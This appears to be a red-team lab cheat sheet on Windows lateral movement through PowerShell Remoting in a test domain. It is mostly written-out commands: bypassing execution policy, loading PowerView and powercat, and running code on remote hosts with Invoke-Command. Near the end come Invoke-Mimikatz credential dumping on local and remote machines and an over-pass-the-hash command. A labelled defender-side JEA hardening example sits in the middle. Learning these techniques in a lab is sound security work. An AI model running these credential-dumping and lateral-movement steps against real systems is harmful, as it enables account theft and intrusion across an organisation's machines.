Lateral Movement PS Remoting

One to one

Admin rights in the PS shell are required to perform all of these tasks.

PS C:\WINDOWS\system32> Enable-PSRemoting -Force

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> powershell.exe -executionpolicy bypass

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> powershell.exe -nop -exec bypass

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> . .\powercat.ps1

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> . .\powerview.ps1

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> Find-LocalAdminAccess

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> New-PSSession -ComputerName WIN-2RUMVG5JPOC.security.local

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> Enter-PSSession -Id 1

[WIN-2RUMVG5JPOC.security.local]: PS C:\Users\Administrator\Documents> whoami

[WIN-2RUMVG5JPOC.security.local]: PS C:\Users\Administrator\Documents> whoami /priv

[WIN-2RUMVG5JPOC.security.local]: PS C:\Users\Administrator\Documents> $proc = Get-Process

[WIN-2RUMVG5JPOC.security.local]: PS C:\Users\Administrator\Documents> $proc

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> $sess = New-PSSession -ComputerName WIN-2RUMVG5JPOC.security.local

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> $sess

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> Enter-PSSession -Session $sess

One to many:

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> Invoke-Command -ComputerName WIN-2RUMVG5JPOC.security.local -ScriptBlock {whoami;hostname}

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> Invoke-Command -ComputerName WIN-2RUMVG5JPOC.security.local -ScriptBlock {$ExecutionContext.SessionState.LanguageMode}

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> $ExecutionContext.SessionState.LanguageMode

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> help *language*

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> help *mode*

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> notepad hello.ps1

Put the hello function in Notepad and save it as hello.ps1.

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> . .\hello.ps1

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> hello

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> Invoke-Command -ComputerName WIN-2RUMVG5JPOC.security.local -ScriptBlock ${function:hello}

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> ls function:

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> $sess

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> Invoke-Command -FilePath C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView\hello.ps1 -Session $sess

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> Enter-PSSession -Session $sess

[WIN-2RUMVG5JPOC.security.local]: PS C:\Users\Administrator\Documents> hello

[WIN-2RUMVG5JPOC.security.local]: PS C:\Users\Administrator\Documents> exit

Use the following to execute stateful commands with Invoke-Command (the session keeps its variables between calls):

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> Invoke-Command -Session $sess -ScriptBlock {$proc = get-process}

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> Invoke-Command -Session $sess -ScriptBlock {$proc.name}
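The one-to-one and one-to-many sessions above all land in the default full-language admin endpoint, which is why arbitrary script blocks, dot-sourced functions and stateful variables work. As an added, defender-side example (not code from the original notes), this registers a Just Enough Administration (JEA) endpoint that restricts remote sessions to a fixed set of commands in NoLanguage mode. The module, role, group and transcript-directory names are assumptions for the example.

```powershell
# Added example, not from the original notes: register a JEA endpoint so that
# New-PSSession / Invoke-Command / Enter-PSSession against it get a
# RestrictedRemoteServer session in NoLanguage mode with only the listed
# cmdlets, instead of the full-language admin shell shown above.
# Module, role and group names (JEAHelpdesk, HelpdeskRole, SECURITY\Helpdesk) are assumptions.
$moduleRoot = Join-Path $env:ProgramFiles 'WindowsPowerShell\Modules\JEAHelpdesk'
$rcDir      = Join-Path $moduleRoot 'RoleCapabilities'
New-Item -ItemType Directory -Path $rcDir -Force | Out-Null
New-ModuleManifest -Path (Join-Path $moduleRoot 'JEAHelpdesk.psd1')

# Role capability: the only commands a connecting user can run. Nothing here
# lets the caller dot-source a file, define a function or assign a variable,
# so the hello.ps1 / ${function:hello} and {$proc = get-process} steps above
# are rejected by the endpoint.
New-PSRoleCapabilityFile -Path (Join-Path $rcDir 'HelpdeskRole.psrc') `
    -VisibleCmdlets 'Get-Process', 'Get-Service',
        @{ Name = 'Restart-Service'; Parameters = @{ Name = 'Name'; ValidateSet = 'Spooler', 'W32Time' } }

# Session configuration: NoLanguage mode, a virtual RunAs account (helpdesk
# users need no admin rights of their own on the host) and a transcript of
# every command issued through the endpoint.
$pssc = Join-Path $env:TEMP 'SECURITY.Helpdesk.pssc'
New-PSSessionConfigurationFile -Path $pssc `
    -SessionType RestrictedRemoteServer `
    -LanguageMode NoLanguage `
    -RunAsVirtualAccount `
    -TranscriptDirectory 'C:\JEATranscripts' `
    -RoleDefinitions @{ 'SECURITY\Helpdesk' = @{ RoleCapabilities = 'HelpdeskRole' } }

if (-not (Test-PSSessionConfigurationFile -Path $pssc)) { throw "invalid session configuration file: $pssc" }
Register-PSSessionConfiguration -Name 'SECURITY.Helpdesk' -Path $pssc -Force | Out-Null

# Server-side check: Permission lists who may connect to each endpoint. The
# default microsoft.powershell endpoint still exists; tighten its ACL with
#   Set-PSSessionConfiguration -Name microsoft.powershell -ShowSecurityDescriptorUI
Get-PSSessionConfiguration | Select-Object Name, Permission

# Client side, same cmdlets as above but pointed at the restricted endpoint:
#   Invoke-Command -ComputerName WIN-2RUMVG5JPOC.security.local -ConfigurationName SECURITY.Helpdesk -ScriptBlock { Get-Process }
# A script block such as {$proc = get-process} or {$ExecutionContext.SessionState.LanguageMode}
# fails here because variable assignment and property access are not permitted in NoLanguage mode,
# and whoami is not a visible command.
```

Transcripts written to the TranscriptDirectory give the defender a per-session record of exactly which of the visible commands were run and by whom.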

Lateral movement with Invoke-Mimikatz:

https://github.com/PowerShellMafia/PowerSploit

With normal rights in the PS shell:

PS C:\Users\victim.SECURITY\Downloads\PowerSploit-master\PowerSploit-master\Exfiltration> . .\Invoke-Mimikatz.ps1

Dump credentials on a local machine:

PS C:\Users\victim.SECURITY\Downloads\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Mimikatz -DumpCreds

Dump credentials on multiple remote machines:

PS C:\Users\victim.SECURITY\Downloads\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Mimikatz -DumpCreds -ComputerName WIN-2RUMVG5JPOC.security.local

Over-pass-the-hash: generate tokens from hashes:

PS C:\Users\victim.SECURITY\Downloads\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:security.local /ntlm:<ntlmhash> /run:powershell.exe"'

@Saksham Dixit